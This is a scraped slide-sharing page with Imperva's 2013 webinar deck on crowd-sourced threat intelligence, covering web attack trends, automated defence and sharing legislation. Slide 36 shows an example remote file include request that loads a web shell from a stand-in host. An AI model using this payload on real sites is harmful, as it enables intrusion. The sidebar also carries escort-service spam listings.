7 Tips to Protect Your Data from Contractors and Privileged Vendors
7 Tips to Protect Your Data from Contractors and Privileged Vendors7 Tips to Protect Your Data from Contractors and Privileged Vendors
7 Tips to Protect Your Data from Contractors and Privileged VendorsImperva
 
SEO Botnet Sophistication
SEO Botnet SophisticationSEO Botnet Sophistication
SEO Botnet SophisticationImperva
 
Phishing Made Easy
Phishing Made EasyPhishing Made Easy
Phishing Made EasyImperva
 
Imperva 2017 Cyber Threat Defense Report
Imperva 2017 Cyber Threat Defense ReportImperva 2017 Cyber Threat Defense Report
Imperva 2017 Cyber Threat Defense ReportImperva
 
Combat Payment Card Attacks with WAF and Threat Intelligence
Combat Payment Card Attacks with WAF and Threat IntelligenceCombat Payment Card Attacks with WAF and Threat Intelligence
Combat Payment Card Attacks with WAF and Threat IntelligenceImperva
 
HTTP/2: Faster Doesn't Mean Safer, Attack Surface Growing Exponentially
HTTP/2: Faster Doesn't Mean Safer, Attack Surface Growing ExponentiallyHTTP/2: Faster Doesn't Mean Safer, Attack Surface Growing Exponentially
HTTP/2: Faster Doesn't Mean Safer, Attack Surface Growing ExponentiallyImperva
 
Get Going With Your GDPR Plan
Get Going With Your GDPR PlanGet Going With Your GDPR Plan
Get Going With Your GDPR PlanImperva
 
Cyber Criminal's Path To Your Data
Cyber Criminal's Path To Your DataCyber Criminal's Path To Your Data
Cyber Criminal's Path To Your DataImperva
 
Combat Today's Threats With A Single Platform For App and Data Security
Combat Today's Threats With A Single Platform For App and Data SecurityCombat Today's Threats With A Single Platform For App and Data Security
Combat Today's Threats With A Single Platform For App and Data SecurityImperva
 
Hacking HTTP/2 : New attacks on the Internet’s Next Generation Foundation
Hacking HTTP/2 : New attacks on the Internet’s Next Generation FoundationHacking HTTP/2 : New attacks on the Internet’s Next Generation Foundation
Hacking HTTP/2 : New attacks on the Internet’s Next Generation FoundationImperva
 
Gartner MQ for Web App Firewall Webinar
Gartner MQ for Web App Firewall WebinarGartner MQ for Web App Firewall Webinar
Gartner MQ for Web App Firewall WebinarImperva
 

More from Imperva (20)

Cybersecurity and Healthcare - HIMSS 2018 Survey
Cybersecurity and Healthcare - HIMSS 2018 SurveyCybersecurity and Healthcare - HIMSS 2018 Survey
Cybersecurity and Healthcare - HIMSS 2018 Survey
 
API Security Survey
API Security SurveyAPI Security Survey
API Security Survey
 
Imperva ppt
Imperva pptImperva ppt
Imperva ppt
 
Research: From zero to phishing in 60 seconds
Research: From zero to phishing in 60 seconds Research: From zero to phishing in 60 seconds
Research: From zero to phishing in 60 seconds
 
Making Sense of Web Attacks: From Alerts to Narratives
Making Sense of Web Attacks: From Alerts to NarrativesMaking Sense of Web Attacks: From Alerts to Narratives
Making Sense of Web Attacks: From Alerts to Narratives
 
How We Blocked a 650Gb DDoS Attack Over Lunch
How We Blocked a 650Gb DDoS Attack Over LunchHow We Blocked a 650Gb DDoS Attack Over Lunch
How We Blocked a 650Gb DDoS Attack Over Lunch
 
Survey: Insider Threats and Cyber Security
Survey: Insider Threats and Cyber SecuritySurvey: Insider Threats and Cyber Security
Survey: Insider Threats and Cyber Security
 
Companies Aware, but Not Prepared for GDPR
Companies Aware, but Not Prepared for GDPRCompanies Aware, but Not Prepared for GDPR
Companies Aware, but Not Prepared for GDPR
 
Rise of Ransomware
Rise of Ransomware Rise of Ransomware
Rise of Ransomware
 
7 Tips to Protect Your Data from Contractors and Privileged Vendors
7 Tips to Protect Your Data from Contractors and Privileged Vendors7 Tips to Protect Your Data from Contractors and Privileged Vendors
7 Tips to Protect Your Data from Contractors and Privileged Vendors
 
SEO Botnet Sophistication
SEO Botnet SophisticationSEO Botnet Sophistication
SEO Botnet Sophistication
 
Phishing Made Easy
Phishing Made EasyPhishing Made Easy
Phishing Made Easy
 
Imperva 2017 Cyber Threat Defense Report
Imperva 2017 Cyber Threat Defense ReportImperva 2017 Cyber Threat Defense Report
Imperva 2017 Cyber Threat Defense Report
 
Combat Payment Card Attacks with WAF and Threat Intelligence
Combat Payment Card Attacks with WAF and Threat IntelligenceCombat Payment Card Attacks with WAF and Threat Intelligence
Combat Payment Card Attacks with WAF and Threat Intelligence
 
HTTP/2: Faster Doesn't Mean Safer, Attack Surface Growing Exponentially
HTTP/2: Faster Doesn't Mean Safer, Attack Surface Growing ExponentiallyHTTP/2: Faster Doesn't Mean Safer, Attack Surface Growing Exponentially
HTTP/2: Faster Doesn't Mean Safer, Attack Surface Growing Exponentially
 
Get Going With Your GDPR Plan
Get Going With Your GDPR PlanGet Going With Your GDPR Plan
Get Going With Your GDPR Plan
 
Cyber Criminal's Path To Your Data
Cyber Criminal's Path To Your DataCyber Criminal's Path To Your Data
Cyber Criminal's Path To Your Data
 
Combat Today's Threats With A Single Platform For App and Data Security
Combat Today's Threats With A Single Platform For App and Data SecurityCombat Today's Threats With A Single Platform For App and Data Security
Combat Today's Threats With A Single Platform For App and Data Security
 
Hacking HTTP/2 : New attacks on the Internet’s Next Generation Foundation
Hacking HTTP/2 : New attacks on the Internet’s Next Generation FoundationHacking HTTP/2 : New attacks on the Internet’s Next Generation Foundation
Hacking HTTP/2 : New attacks on the Internet’s Next Generation Foundation
 
Gartner MQ for Web App Firewall Webinar
Gartner MQ for Web App Firewall WebinarGartner MQ for Web App Firewall Webinar
Gartner MQ for Web App Firewall Webinar
 

Recently uploaded

[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?Antenna Manufacturer Coco
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfsudhanshuwaghmare1
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityPrincipled Technologies
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Neo4j
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfEnterprise Knowledge
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slidevu2urc
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Igalia
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUK Journal
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Servicegiselly40
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProduct Anonymous
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century educationjfdjdjcjdnsjd
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherRemote DBA Services
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)wesley chun
 

Recently uploaded (20)

[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 

The Value of Crowd-Sourced Threat Intelligence

  • 1. © 2013 Imperva, Inc. All rights reserved. Crowd Sourced Threat Intelligence Amichai Shulman, CTO, Imperva Confidential1 May 2013
  • 2. © 2013 Imperva, Inc. All rights reserved. Agenda Confidential2 §  Introduction to crowd sourcing and threat intelligence §  Application layer threat intelligence •  Research report §  Actionable threat intelligence •  Turning threat intelligence into community defense §  Threat intelligence and legislation •  Pros, Cons and Etat D’Affaire §  Summary & conclusions §  Q&A
  • 3. © 2013 Imperva, Inc. All rights reserved. Amichai Shulman – CTO Imperva Confidential3 §  Speaker at Industry Events •  RSA, Appsec, Info Security UK, Black Hat §  Lecturer on Information Security •  Technion - Israel Institute of Technology §  Former security consultant to banks & financial services firms §  Leads the Application Defense Center (ADC) •  Discovered over 20 commercial application vulnerabilities §  Credited by Oracle, MS-SQL, IBM and others Amichai Shulman one of InfoWorld’s “Top 25 CTOs”
  • 4. © 2013 Imperva, Inc. All rights reserved. HII Reports Confidential4 §  Hacker Intelligence Initiative is focused at understanding how attackers are operating in practice •  A different approach from vulnerability research §  Data set composition •  ~60 real world applications •  Anonymous Proxies §  More than 24 months of data §  Powerful analysis system •  Combines analytic tools with drill down capabilities
  • 5. © 2013 Imperva, Inc. All rights reserved. Introduction Confidential5 Crowd Sourcing and Threat Information Sharing
  • 6. © 2013 Imperva, Inc. All rights reserved. What is Crowd Sourcing Confidential6 §  “The Wisdom of Crowds: Why the Many Are Smarter Than the Few and How Collective Wisdom Shapes Business, Economies, Societies and Nations”*
  • 7. © 2013 Imperva, Inc. All rights reserved. Crowd Sourcing in Practice Confidential7
  • 8. © 2013 Imperva, Inc. All rights reserved. Threat Information Sharing Confidential8 §  AV vendor customers sharing suspicious files with their vendors •  Manual process •  If not manual than how do you define suspicious? §  Anti-spam vendors collecting email data from all deployments •  Privacy? •  Confidentiality §  Customer groups for sharing battle stories •  Timely?
  • 9. © 2013 Imperva, Inc. All rights reserved. Threat Intelligence Confidential9 §  Infer NEW information regarding future attacks from looking at past attacks §  Attacks across organizations share common characteristics •  Sources •  Techniques •  Tools •  Timelines
  • 10. © 2013 Imperva, Inc. All rights reserved. Application Layer Threat Intelligence Confidential10 Research report
  • 11. © 2013 Imperva, Inc. All rights reserved. Some Observations Confidential11 §  Most web attacks are part of large scale industrialized operations •  Reuse of attack platforms •  Reuse of techniques •  Reuse of tools §  Attack campaigns span meaningful time frames
  • 12. © 2013 Imperva, Inc. All rights reserved. More Observations Confidential12 §  Izzadin Kassam attacks on US banks •  Started with a few banks 4 months ago •  Gradually add more targets to the list §  #OpIsrael / #OpUSA / #OpColombia … •  Attacks by hacktivists •  Targeted for a specific time frame •  Pick up many victims and target them with the SAME exact tools over the attack time frame
  • 13. © 2013 Imperva, Inc. All rights reserved. Methodology Confidential13 §  Attack data only •  60 applications •  6 months of data §  Analyze dominant attack types •  SQL Injection •  Remote File Include •  Comment Spam •  Local File Include •  Directory Traversal
  • 14. © 2013 Imperva, Inc. All rights reserved. SQL Injection – Source Threat Quadrant Confidential14 Multi target, persistent sources Multi target sources Persistent sourcesSingletons
  • 15. © 2013 Imperva, Inc. All rights reserved. SQL Injection – Source Threat Quadrant Confidential15 Multi target, persistent sources
  • 16. © 2013 Imperva, Inc. All rights reserved. SQL Injection – Time Perspective Confidential16 0 2 4 6 8 10 12 14 16 18 01/01/2013 03/01/2013 05/01/2013 07/01/2013 09/01/2013 11/01/2013 13/01/2013 15/01/2013 17/01/2013 19/01/2013 21/01/2013 23/01/2013 25/01/2013 27/01/2013 29/01/2013 31/01/2013 02/02/2013 04/02/2013 06/02/2013 08/02/2013 10/02/2013 12/02/2013 14/02/2013 16/02/2013 18/02/2013 20/02/2013 22/02/2013 24/02/2013 26/02/2013 28/02/2013 Targets Accumulating Current
  • 17. © 2013 Imperva, Inc. All rights reserved. Comment Spam – Source Threat Quadrant Confidential17 Multi target, persistent sources
  • 18. © 2013 Imperva, Inc. All rights reserved. Remote File Include – URL Threat Quadrant Confidential18 Multi target, persistent vectors
  • 19. © 2013 Imperva, Inc. All rights reserved. Remote File Include - Example Confidential19 §  Reconnaissance campaign based on benign URL •  http://google.com/humans.txt §  11 different applications targeted using the same URL •  5144 different requests §  Spread throughout an entire month §  Next slide shows a network graph of attack sources to targets •  We can learn about the relationship between attack sources
  • 20. © 2013 Imperva, Inc. All rights reserved. Remote File Include - Example Confidential20
  • 21. © 2013 Imperva, Inc. All rights reserved. Use of Attack Tools Confidential21 Percentage of Automated Attacks 0% 10% 20% 30% 40% 50% 60% 70% 80% 90% 100% RFI LFI SQLi ComSpm XSS DT Total Attacks Automated
  • 22. © 2013 Imperva, Inc. All rights reserved. Actionable Threat Intelligence Confidential22 Turning Threat Intelligence Into Community Defense
  • 23. © 2013 Imperva, Inc. All rights reserved. Actionable Intelligence Life Cycle Confidential23 Known attack patterns Apply on traffic to identify attackers Known attackers Apply on traffic to identify new patterns
  • 24. © 2013 Imperva, Inc. All rights reserved. Actionable Threat Intelligence Confidential24 §  Multiphase •  Distributed data collection •  Information extraction •  Analysis and knowledge generation •  Knowledge validation •  Distribution of knowledge to devices §  Cycle must be completely automated in order to provide value in a timely manner and at scale •  Not an information sharing hub
  • 25. © 2013 Imperva, Inc. All rights reserved. The Cost of Decision Making Confidential25 §  Problem scale is increasing •  Number of attacks is constantly growing •  Number of applications per organization is growing §  Resources are stagnant •  No additional HC §  Organizations must reduce the proportion of alerts that require human decision making §  By introducing mechanisms based on actionable intelligence, organizations increase the accuracy of detection with respect to a larger portion of the attacks
  • 26. © 2013 Imperva, Inc. All rights reserved. Threat Intelligence and Legislation Confidential26 Pros, Cons and Etat D’Affaire
  • 27. © 2013 Imperva, Inc. All rights reserved. Current Legislation Confidential27 §  US Cyber Intelligence Sharing and Protection Act (CISPA) •  Passed late April 2013 •  Sets up the LEGAL grounds for bilateral information sharing between private sector entities and government entities •  Addresses issues of eligibility, liability and protection of share information
  • 28. © 2013 Imperva, Inc. All rights reserved. Current Legislation Confidential28 §  UK Cyber Security Information Sharing Partnership (CISP) •  Launched Late March 2013 (piloted through 2012) •  Sets up procedural and technical grounds for information sharing between private sector and government •  Comprises an operations room, reporting portal and program definitions •  Similar program exists for cyber crime (CCRP)
  • 29. © 2013 Imperva, Inc. All rights reserved. Cons Confidential29 §  Misuse of information by governments •  Invade privacy in various ways •  Otherwise would require court order §  Information sharing platform •  Does not provide for extraction of actionable intelligence §  Governments usually do things the wrong way •  E.g. the complexity of the STIX language
  • 30. © 2013 Imperva, Inc. All rights reserved. Pros Confidential30 §  Regulate how data is being anonymized and protected §  Encourage more organizations to take part in this effort •  Achieve better results faster •  Reduce overall damage to public §  Standardize on various components
  • 31. © 2013 Imperva, Inc. All rights reserved. Summary & Conclusions Confidential31
  • 32. © 2013 Imperva, Inc. All rights reserved. Summary Confidential32 §  Threat intelligence has a measurable potential value for Web application attacks §  Threat intelligence can be used to identify and detect attack sources, attack vectors and attack tools §  Actionable threat intelligence is crucial for exploiting the potential value of threat intelligence •  Not information sharing hubs •  No manual processes §  Actionable threat intelligence helps organizations reduce the cost of security decision making and enables them to handle increasing volumes of attack traffic
  • 33. © 2013 Imperva, Inc. All rights reserved. ThreatRadar Community Defense Confidential33
  • 34. © 2013 Imperva, Inc. All rights reserved. ThreatRadar Community Defense 34
  • 35. © 2013 Imperva, Inc. All rights reserved. ThreatRadar Community Defense 35 ThreatRadar Community Defense §  Gathers live attack data from SecureSphere WAFs around the world §  Distributes attack patterns and reputation data in near-real time
  • 36. © 2013 Imperva, Inc. All rights reserved. 1. SecureSphere detects a possible RFI attack ThreatRadar Servers Internet User Web Servers 2. Sends event to ThreatRadar Cloud Community Defense – How It Works © Copyright 2012 Imperva, Inc. All rights reserved. 36 /vulnerable.php?C=http://evil.com/webshell.txt? 3. If ThreatRadar verifies site is malicious, it will distribute new RFI pattern to community
  • 37. © 2013 Imperva, Inc. All rights reserved. Webinar Materials Confidential37 Post-Webinar Discussions Answers to Attendee Questions Webinar Recording Link Join Group Join Imperva LinkedIn Group, Imperva Data Security Direct, for…
  • 38. © 2013 Imperva, Inc. All rights reserved. www.imperva.com 38 Confidential